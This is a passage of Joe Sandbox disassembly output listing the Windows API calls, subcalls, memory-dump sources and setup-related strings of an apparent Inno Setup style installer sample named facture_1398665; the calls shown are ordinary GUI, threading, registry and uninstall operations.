    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004FBDC3
    • CloseHandle.KERNEL32(00000000), ref: 004FBDC9
    • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?,00000000,00000000), ref: 004FBDDD
      • Part of subcall function 004B0150: Sleep.KERNEL32(?), ref: 004B016F
      • Part of subcall function 004B0150: Sleep.KERNEL32(?), ref: 004B017F
      • Part of subcall function 004B0150: GetLastError.KERNEL32 ref: 004B0192
      • Part of subcall function 004B0150: GetLastError.KERNEL32 ref: 004B019C
      • Part of subcall function 0047BE4C: GetLastActivePopup.USER32(?), ref: 0047BE74
      • Part of subcall function 0047BE4C: IsWindowVisible.USER32(?), ref: 0047BE88
      • Part of subcall function 0047BE4C: IsWindowEnabled.USER32(?), ref: 0047BE92
      • Part of subcall function 0047BE4C: SetForegroundWindow.USER32(?), ref: 0047BE9C
    Strings
    • Deleting Uninstall data files., xrefs: 004FBCD1
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • RectVisible.GDI32(?,?), ref: 00461170
    • SaveDC.GDI32(?), ref: 00461193
      • Part of subcall function 004595F0: GetWindowOrgEx.GDI32(?), ref: 004595FE
      • Part of subcall function 004595F0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00459614
    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004611D3
    • RestoreDC.GDI32(?,00460FF2), ref: 004611FF
      • Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA
    • CreateSolidBrush.GDI32(00000000), ref: 004612A8
    • FrameRect.USER32(?,?,?), ref: 004612D6
    • DeleteObject.GDI32(00000000), ref: 004612DC
    • CreateSolidBrush.GDI32(00000000), ref: 004612EC
    • FrameRect.USER32(?,?,?), ref: 0046131A
    • DeleteObject.GDI32(00000000), ref: 00461320
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431F94
      • Part of subcall function 00431F8C: LeaveCriticalSection.KERNEL32(0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FA1
      • Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(?,0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FAA
    • CreateCompatibleDC.GDI32(00000000), ref: 00431A64
    • SelectObject.GDI32(?,?), ref: 00431A74
      • Part of subcall function 00435B00: GetObjectW.GDI32(?,00000054,?), ref: 00435B66
    • DeleteDC.GDI32(?), ref: 00431C1C
      • Part of subcall function 00432AFC: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00432B3F
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432B54
      • Part of subcall function 00432AFC: MaskBlt.GDI32(?,?,?,?,?,?,00000000,00431C22,?,?,?,CCAA0029), ref: 00432B98
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432BB2
      • Part of subcall function 00432AFC: DeleteObject.GDI32(?), ref: 00432BBE
      • Part of subcall function 00432AFC: CreateCompatibleDC.GDI32(00000000), ref: 00432BD2
      • Part of subcall function 00432AFC: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00432BF3
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,?), ref: 00432C08
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,870801FD,00000000), ref: 00432C1C
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,?,00000000), ref: 00432C2E
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,00000000,000000FF), ref: 00432C43
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,870801FD,000000FF), ref: 00432C59
      • Part of subcall function 00432AFC: RealizePalette.GDI32(?), ref: 00432C65
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00432C87
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00431C22,?,?,00440328), ref: 00432CA9
      • Part of subcall function 00432AFC: SetTextColor.GDI32(?,00000000), ref: 00432CB1
      • Part of subcall function 00432AFC: SetBkColor.GDI32(?,00FFFFFF), ref: 00432CBF
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00432CEB
      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00432D10
      • Part of subcall function 00432AFC: SetTextColor.GDI32(?,00431C22), ref: 00432D1A
      • Part of subcall function 00432AFC: SetBkColor.GDI32(?,00000000), ref: 00432D24
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,00000000), ref: 00432D37
      • Part of subcall function 00432AFC: DeleteObject.GDI32(?), ref: 00432D40
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,00000000,00000000), ref: 00432D62
      • Part of subcall function 00432AFC: DeleteDC.GDI32(?), ref: 00432D6B
    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 00431B6E
    • SetTextColor.GDI32(?,00000000), ref: 00431B7C
    • SetBkColor.GDI32(?,00FFFFFF), ref: 00431B90
    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 00431BC3
    • SetTextColor.GDI32(?,?), ref: 00431BD3
    • SetBkColor.GDI32(?,?), ref: 00431BE3
    • SelectObject.GDI32(?,00000000), ref: 00431C13
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SaveDC.GDI32(?), ref: 00461401
      • Part of subcall function 004595F0: GetWindowOrgEx.GDI32(?), ref: 004595FE
      • Part of subcall function 004595F0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00459614
    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0046143A
    • GetWindowLongW.USER32(00000000,000000EC), ref: 0046144E
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0046146F
      • Part of subcall function 004613E4: SetRect.USER32(00000010,00000000,00000000,?,?), ref: 004614CF
      • Part of subcall function 004613E4: IntersectClipRect.GDI32(?,00000000,00000000,00000010,?), ref: 0046153F
      • Part of subcall function 004613E4: SetRect.USER32(?,00000000,00000000,?,?), ref: 00461560
      • Part of subcall function 004613E4: DrawEdge.USER32(?,?,00000000,00000000), ref: 0046156F
      • Part of subcall function 004613E4: IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00461598
    • RestoreDC.GDI32(?,?), ref: 00461617
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1
    • GetCapture.USER32 ref: 00478115
    • GetCapture.USER32 ref: 00478124
    • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 0047812A
    • ReleaseCapture.USER32 ref: 0047812F
    • GetActiveWindow.USER32 ref: 0047814C
    • IsWindow.USER32(00000000), ref: 00478192
    • GetActiveWindow.USER32 ref: 0047819B
      • Part of subcall function 00479CA8: GetCursorPos.USER32 ref: 00479CC3
      • Part of subcall function 00479CA8: WindowFromPoint.USER32(?,?), ref: 00479CD0
      • Part of subcall function 00479CA8: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00479CDE
      • Part of subcall function 00479CA8: GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00479CE5
      • Part of subcall function 00479CA8: SendMessageW.USER32(00000000,00000084,00000000,00000000), ref: 00479D08
      • Part of subcall function 00479CA8: SendMessageW.USER32(00000000,00000020,00000000,?), ref: 00479D1A
      • Part of subcall function 00479CA8: SetCursor.USER32(00000000), ref: 00479D2C
      • Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32(00470BAC,00000000,00000000,00470C70,?,00000000,00470CAE,?,00480F48,?,00000001), ref: 00470C53
      • Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59
    • SendMessageW.USER32(00000000,0000B000,00000000,00000000), ref: 00478231
    • SendMessageW.USER32(00000000,0000B001,00000000,00000000), ref: 0047829E
    • GetActiveWindow.USER32 ref: 004782AD
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00438260
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00438281
    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 004382B5
    • LeaveCriticalSection.KERNEL32(?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382BB
    • WaitForSingleObject.KERNEL32(?,?), ref: 004382C8
    • SetLastError.KERNEL32(000005B4,?,?,?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382E2
    • SetLastError.KERNEL32(00000000,?,?,?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382F5
    • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00438331,?,00000000,00000000,00000000,00000000), ref: 004382FB
    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00438312
    • CloseHandle.KERNEL32(?), ref: 0043832B
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetSystemMenu.USER32(00000000,00000000), ref: 004769C7
    • DeleteMenu.USER32(00000000,0000F130,00000000), ref: 004769E5
    • DeleteMenu.USER32(00000000,00000007,00000400), ref: 004769F2
    • DeleteMenu.USER32(00000000,00000005,00000400), ref: 004769FF
    • DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00476A0C
    • DeleteMenu.USER32(00000000,0000F020,00000000), ref: 00476A19
    • DeleteMenu.USER32(00000000,0000F000,00000000), ref: 00476A26
    • DeleteMenu.USER32(00000000,0000F120,00000000), ref: 00476A33
    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 00476A51
    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00476A6D
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • FreeLibrary.KERNEL32(00000000), ref: 004E42F3
    • FreeLibrary.KERNEL32(00000000), ref: 004E4307
      • Part of subcall function 004DEED0: FreeLibrary.KERNEL32(72680000,004FDE18,00000000,004FDE27,?,?,?,?,?,004FE903), ref: 004DEEE6
      • Part of subcall function 004DEAEC: GetTickCount.KERNEL32(004DEA98,00000000,00000000,00000001,00000001,00000000,004DEB7E,?,00000000,?,004FDE1D,00000000,004FDE27), ref: 004DEB34
      • Part of subcall function 004B2054: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 004B2073
      • Part of subcall function 00480B10: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7), ref: 00480B1E
      • Part of subcall function 00480B10: ShutdownBlockReasonDestroy.USER32(?,00000000,user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000), ref: 00480B30
    • SendNotifyMessageW.USER32(0007016C,00000496,00002710,00000000), ref: 004E437F
      • Part of subcall function 004E12D8: ShowWindow.USER32(?,00000005), ref: 004E12F8
      • Part of subcall function 004E12D8: SetForegroundWindow.USER32(?), ref: 004E130B
      • Part of subcall function 004AD648: RemoveDirectoryW.KERNEL32(00000000,00000000,004AD6A5,?,?,00000000), ref: 004AD67F
      • Part of subcall function 004AD648: GetLastError.KERNEL32(00000000,00000000,004AD6A5,?,?,00000000), ref: 004AD687
      • Part of subcall function 004AD13C: DeleteFileW.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD173
      • Part of subcall function 004AD13C: GetLastError.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD17B
    Strings
    • GetCustomSetupExitCode, xrefs: 004E4184
    • DeinitializeSetup, xrefs: 004E41E2
    • Restarting Windows., xrefs: 004E435A
    • Not restarting Windows because Setup is being run from the debugger., xrefs: 004E4329
    • Deinitializing Setup., xrefs: 004E4145
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 0042A935
    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000), ref: 0042A9A7
    • EnterCriticalSection.KERNEL32(0050AE80,00000000,0042AAC5), ref: 0042A9CF
      • Part of subcall function 0042A340: SetEvent.KERNEL32(000000A8,0042A5E9), ref: 0042A346
    • LeaveCriticalSection.KERNEL32(0050AE80,00000000,0042AA9E,?,0050AE80,00000000,0042AAC5), ref: 0042AA46
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0042AA62
    • EnterCriticalSection.KERNEL32(0050AE80,0042AA86,0042AA7F,?,0050AE80,00000000,0042AA9E,?,0050AE80,00000000,0042AAC5), ref: 0042AA79
    • LeaveCriticalSection.KERNEL32(0050AE80,0042AAA5,0050AE80,00000000,0042AAC5), ref: 0042AA98
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004118DD), ref: 00411819
    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041184C
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041185E
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 00411864
    • GetStdHandle.KERNEL32(000000F4,004118F8,00000002,?,00000000,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00411878
    • WriteFile.KERNEL32(00000000,000000F4,004118F8,00000002,?), ref: 0041187E
      • Part of subcall function 004115CC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00411778), ref: 004115FF
      • Part of subcall function 004115CC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00411623
      • Part of subcall function 004115CC: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041163E
      • Part of subcall function 004115CC: LoadStringW.USER32(00000000,0000FFE8,?,00000100), ref: 004116D9
    • LoadStringW.USER32(00000000,0000FFE9,?,00000040), ref: 004118A2
    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 004118BC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,004B1B8E,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004B6989,00000000,004B699D), ref: 004B1A9A
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 004B1ADE
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetActiveWindow.USER32 ref: 004BF6F4
    • GetModuleHandleW.KERNEL32(user32.dll), ref: 004BF708
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • GetWindowRect.USER32(?,00000000), ref: 004BF77C
    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 004BF7BF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SHGetMalloc.SHELL32(?), ref: 004BE025
    • GetActiveWindow.USER32 ref: 004BE08F
      • Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32(00470BAC,00000000,00000000,00470C70,?,00000000,00470CAE,?,00480F48,?,00000001), ref: 00470C53
      • Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59
    • CoInitialize.OLE32(00000000), ref: 004BE0A3
    • SHBrowseForFolderW.SHELL32(?), ref: 004BE0BA
    • CoUninitialize.OLE32 ref: 004BE0CF
      • Part of subcall function 00470CC0: IsWindow.USER32(?), ref: 00470CCE
      • Part of subcall function 00470CC0: EnableWindow.USER32(?,000000FF), ref: 00470CDD
    • SetActiveWindow.USER32(?), ref: 004BE0EA
    • SetActiveWindow.USER32(?), ref: 004BE0F3
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0045F97C: GetClassInfoW.USER32(?,?,?), ref: 0045FA4C
      • Part of subcall function 0045F97C: UnregisterClassW.USER32(?,?), ref: 0045FA77
      • Part of subcall function 0045F97C: RegisterClassW.USER32(?), ref: 0045FA96
      • Part of subcall function 0045F97C: GetWindowLongW.USER32(00000000,000000F0), ref: 0045FAD2
      • Part of subcall function 0045F97C: GetWindowLongW.USER32(00000000,000000F4), ref: 0045FAE7
      • Part of subcall function 0045F97C: SetWindowLongW.USER32(00000000,000000F4,00000000), ref: 0045FAFA
    • GetVersion.KERNEL32 ref: 004BFC07
    • SendMessageW.USER32(00000000,0000112C,00000004,00000004), ref: 004BFC4A
    • SHGetFileInfoW.SHELL32(004BFCF0,00000000,?,000002B4,00004011), ref: 004BFC67
    • SendMessageW.USER32(00000000,00001109,00000000,00000000), ref: 004BFC80
    • LoadCursorW.USER32(00000000,00007F02), ref: 004BFC8C
    • SetCursor.USER32(00000000), ref: 004BFC92
    • SetCursor.USER32(?), ref: 004BFCC5
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6,?,00000000), ref: 00480323
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6,?,00000000), ref: 00480376
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6,?,00000000), ref: 004803AE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00460EBC: BeginPaint.USER32(00000000,?), ref: 00460EE7
      • Part of subcall function 00460EBC: SaveDC.GDI32(00000000), ref: 00460F20
      • Part of subcall function 00460EBC: ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 00460FA2
      • Part of subcall function 00460EBC: RestoreDC.GDI32(00000000,?), ref: 00460FD8
      • Part of subcall function 00460EBC: EndPaint.USER32(00000000,?), ref: 00461015
    • BeginPaint.USER32(00000000,?), ref: 00461784
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0046179A
    • CreateCompatibleDC.GDI32(00000000), ref: 004617B1
    • SelectObject.GDI32(?,?), ref: 004617C1
